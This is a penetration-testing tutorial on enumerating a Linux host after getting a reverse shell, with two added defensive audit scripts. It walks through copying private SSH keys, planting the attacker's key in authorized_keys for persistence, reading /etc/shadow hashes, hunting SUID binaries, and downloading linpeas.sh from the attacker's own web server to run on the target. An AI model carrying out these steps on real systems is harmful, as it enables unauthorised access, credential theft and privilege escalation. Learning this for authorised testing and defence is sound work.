Basic enumeration vectors after getting a reverse shell on a Linux machine

Problem:

After getting a reverse shell on the target machine it is easy to get lost deciding where to move next in order to escalate privileges. Thorough enumeration of the machine is the key step in this process, and you need an established methodology for finding the clues that lead to full control of the target.

Basic enumeration methodology:

  1. After getting the reverse shell, the first thing to do is stabilize it.
  2. Enumerate the most important files on the Linux system and try to identify possible security flaws.
  3. Check the most sensitive files under the /etc directory.
  4. If necessary, use automated enumeration scripts such as LinPEAS and LinEnum.

Check the .ssh directory for SSH keys:

  1. Check whether the .ssh directory contains SSH keys and whether you have write permission on it:
    cd ~/.ssh
    ls -al
    
  2. If it contains private keys, copy them to your attacking machine and use them:
    chmod 600 [secret_key]
    chmod 600 id_rsa
    ssh -i [secret_key] [username]@[target_machine_ip]
    ssh -i id_rsa user@10.10.20.53
    
  3. If there are no keys on the target machine, generate a key pair on your machine and transfer the public key to the target:
    cd ~/.ssh
    ssh-keygen
    
  4. Append the content of your public key to the authorized_keys file in the ~/.ssh folder on the target machine:
    # On the target machine
    cd ~/.ssh
    # If the authorized_keys file is not present, create it
    touch authorized_keys
    vim authorized_keys
    # Paste your public key, then save and close the file
    

System enumeration

  1. Check basic information about the system and the current user:
    id
    uname -a
    
  2. Check the ~/.bash_history file, which keeps the user's command history:
    cat ~/.bash_history
    
  3. Check the .bash_profile and .bashrc files for unusual shell commands, aliases or references to files and binaries:
    cat ~/.bash_profile
    cat ~/.bashrc
    
  4. Check the sudo version, as some versions are vulnerable to privilege escalation:
    sudo -V
    
  5. Check whether the user can run any commands with sudo:
    sudo -l
    
    If so, look the allowed binaries up on GTFOBins and use them to escalate.

Check files under the /etc directory:

  1. Check the /etc/passwd file, which stores the information required for the user login process:
    cat /etc/passwd
    user:x:1003:1003:,,,:/home/user:/bin/bash
    # x - indicates that the encrypted account password is stored in /etc/shadow and is not shown here in plain text
    # 1003 - user ID (UID): each non-root user has their own UID (1-99); UID 0 is reserved for root
    # 1003 - group ID (GID)
    # ,,, - comment field with user information (GECOS)
    # /home/user - the user's home directory
    # /bin/bash - path of the command or shell started for the user at login
    
  2. If you have write access to /etc/passwd you can escalate by adding a custom entry with root privileges.
  3. Check the /etc/shadow file, which stores the password hashes for user accounts:
    cat /etc/shadow
    user:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAMWf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:18483:0:99999:8:::
    # user - username
    # $6$1FiLdnFwT... - password hash; the $6$ prefix denotes SHA-512, while $1$ denotes MD5
    # 18483 - days since the Unix epoch (1970-01-01) at which the password was last changed
    # 0 - minimum number of days between password changes
    # 99999 - maximum number of days the password is valid
    # 8 - number of days before expiry that the user is warned to change the password
    
  4. Check the /etc/hosts file for unusual network entries.
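The two layouts walked through above (the /etc/passwd entry in step 1 and the /etc/shadow entry in step 3), as an added example that is not part of the original page: small POSIX shell helpers that parse both formats and flag the entries an auditor cares about, such as a second UID 0 account or a password field not delegated to /etc/shadow. The status words, function names and sample lines are constructed here.

```shell
# Added example, not from the original page: audit helpers for the
# /etc/passwd and /etc/shadow layouts explained above. Sample lines
# below are constructed (fake hashes) so the script runs offline.

# Classify one /etc/passwd line: flag a non-root account with UID 0
# (the custom entry the text describes) and a password field that
# is not the "x" marker, i.e. a hash or empty password kept outside
# /etc/shadow. Status words are our own labels.
passwd_check() {
    IFS=: read -r name pw uid gid gecos home shell <<EOF
$1
EOF
    if [ "$uid" = "0" ] && [ "$name" != "root" ]; then echo "rogue-uid-0"
    elif [ "$pw" != "x" ] && [ "$pw" != "*" ]; then echo "unshadowed"
    else echo "ok"; fi
}

# Map the $id$ prefix of a shadow hash to its algorithm ($6$ SHA-512,
# $1$ MD5, as in the field walkthrough). A leading "!" or a bare "*"
# means the account is locked or has no usable password.
shadow_hash_type() {
    case "$1" in
        '!'*|'*') echo "locked" ;;
        '$6$'*)   echo "sha512" ;;
        '$5$'*)   echo "sha256" ;;
        '$y$'*)   echo "yescrypt" ;;
        '$1$'*)   echo "md5" ;;
        '')       echo "empty" ;;
        *)        echo "unknown" ;;
    esac
}

# Print "user algorithm last-change-day" for each line of a shadow file.
audit_shadow_file() {
    while IFS= read -r line; do
        IFS=: read -r name hash lastchg rest <<EOF
$line
EOF
        printf '%s %s %s\n' "$name" "$(shadow_hash_type "$hash")" "$lastchg"
    done < "$1"
}

# Demo on constructed files; on a real host these would be /etc/passwd and /etc/shadow.
tmp=$(mktemp -d)
printf 'root:x:0:0:root:/root:/bin/bash\nrogue:x:0:0::/root:/bin/bash\n' > "$tmp/passwd"
printf 'root:$6$saltsalt$FAKEHASH:18483:0:99999:7:::\nwww-data:*:18483:0:99999:7:::\n' > "$tmp/shadow"
while IFS= read -r l; do printf '%s %s\n' "${l%%:*}" "$(passwd_check "$l")"; done < "$tmp/passwd"
audit_shadow_file "$tmp/shadow"
rm -rf "$tmp"
```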

Use the find command to search for sensitive files

  1. Look for .log, .conf and backup .bak files:
    # Use find to search the whole filesystem by type and name; quote the pattern so the shell does not expand it first
    find / -type [file_type] -name "[file_name]" 2>/dev/null
    find / -type f -name "*.log" 2>/dev/null
    
    The most common file extensions are:
    .a : a static library;
    .au : an audio file;
    .bin : a) a binary image of a CD (usually a .cue file is also included); b) a binary file that is meant to be executed;
    .bz2 : a file compressed using bzip2;
    .c : a C source file;
    .conf : a configuration file. System-wide config files reside in /etc, while user-specific configuration lives somewhere in the user's home directory;
    .cpp : a C++ source file;
    .deb : a Debian package;
    .diff : a file containing instructions to apply a patch from a base version to another version of a single file or a project (such as the Linux kernel);
    .dsc : a Debian source information file;
    .ebuild : a Bash script used to install programs through the Portage system, especially prevalent on Gentoo systems;
    .el : an Emacs Lisp code file;
    .elc : a compiled Emacs Lisp code file;
    .gif : a graphical or image file;
    .h : a C or C++ header file;
    .html/.htm : an HTML file;
    .iso : an image (copy) of a CD-ROM or DVD in the ISO-9660 filesystem format;
    .jpg : a graphical or image file, such as a photo or artwork;
    .ko : the kernel module extension for the 2.6.x series kernel;
    .la : a file created by libtool to aid in using the library;
    .lo : the intermediate file of a library that is being compiled;
    .lock : a lock file that prevents the use of another file;
    .log : a system or program's log file;
    .m4 : an M4 macro code file;
    .o : 1) the intermediate file of a program that is being compiled; 2) the kernel module extension for a 2.4 series kernel; 3) a program object file;
    .pdf : an electronic image of a document;
    .php : a PHP script;
    .pid : some programs write their process ID into a file with this extension;
    .pl : a Perl script;
    .png : a graphical or image file;
    .ps : a PostScript file, formatted for printing;
    .py : a Python script;
    .rpm : an RPM package, used by distributions whose package management is based on RPM;
    .s : an assembly source code file;
    .sh : a shell script;
    .so : a shared object, i.e. a shared library, the equivalent of a Windows DLL file;
    .src : a source code file, written in plain text, which must be compiled to be used;
    .sfs : a Squashfs filesystem used in the SFS technology;
    .tar.bz2, .tbz2, .tar.gz : a compressed archive;
    .tcl : a Tcl script;
    .tgz : a compressed archive; may also denote a Slackware binary or source package;
    .txt : a plain ASCII text file;
    .xbm : an X Window bitmap image;
    .xpm : an image file;
    .xcf.gz, .xcf : a GIMP image (native image format of the GIMP);
    .xwd : a screenshot or image of a window taken with xwd;
    .zip : a file in ZIP format, a popular compression format;
    .wav : an audio file.
    
  2. Search for files with the SUID bit set:
    SUID (set-user-ID) is a permission bit that makes a file execute with the privileges of its owner rather than those of the user who runs it.
    find / -perm -u=s -type f 2>/dev/null
    # -perm -u=s matches files with the SUID bit set; 2>/dev/null hides permission-denied errors
    
    If any are found, look them up on GTFOBins to see whether they can be used to escalate.
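A baseline check built on the SUID search in step 2, as an added example that is not part of the original page, written for the defender who wants to notice SUID/SGID files that were not there before: it inventories such files under a root directory and diffs the result against a previously saved list. The function names, the temporary tree and the file names are constructed for the demo.

```shell
# Added example, not from the original page: a baseline check built on
# the find command above, so that SUID/SGID files that appear later (for
# example after a package install or a misconfiguration) stand out.

# List SUID or SGID regular files under $1, sorted, one path per line.
# -perm -4000 matches SUID and -perm -2000 SGID; "-perm -u=s" above is
# the SUID half of this written symbolically.
suid_inventory() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Print paths that are SUID/SGID under $2 now but absent from the baseline
# file $1 (written earlier by suid_inventory). comm requires sorted input,
# which suid_inventory guarantees for both sides.
suid_new_since() {
    suid_inventory "$2" | comm -13 "$1" -
}

# Demo: build a constructed tree, take a baseline, add a file with the
# SUID bit and show that only the new file is reported.
root=$(mktemp -d)
mkdir -p "$root/usr/bin"
: > "$root/usr/bin/tool"; chmod 4755 "$root/usr/bin/tool"
: > "$root/usr/bin/plain"; chmod 755 "$root/usr/bin/plain"
suid_inventory "$root" > "$root/baseline.txt"
: > "$root/usr/bin/late"; chmod 4755 "$root/usr/bin/late"
echo "new SUID/SGID files since baseline:"
suid_new_since "$root/baseline.txt" "$root"
rm -rf "$root"
```

On a real host you would run suid_inventory / once at build time, store the list off-box, and re-run suid_new_since on a schedule.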

Check for unusual network connections on the host:

The netstat command displays network status and protocol statistics, including which local services are listening and which process owns each socket.

netstat -tulpn
# -t TCP, -u UDP, -l listening sockets only, -p owning process, -n numeric addresses and ports

Use automated scripts for enumeration:

  1. Transfer the linpeas.sh script to the target machine and execute it:
    # ON YOUR MACHINE
    cd
    wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
    # START A WEB SERVER, DEFAULT PORT 8000
    python3 -m http.server
    # ON THE TARGET MACHINE
    wget http://[your_machine_ip]:8000/linpeas.sh
    chmod +x linpeas.sh
    ./linpeas.sh
    
  2. Alternatively, use the more lightweight LinEnum.sh script and transfer it to the target the same way as linpeas.sh:
    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
    

Reference:

  1. Understanding the /etc/shadow File
  2. Most common linux file extensions
  3. Port Forwarding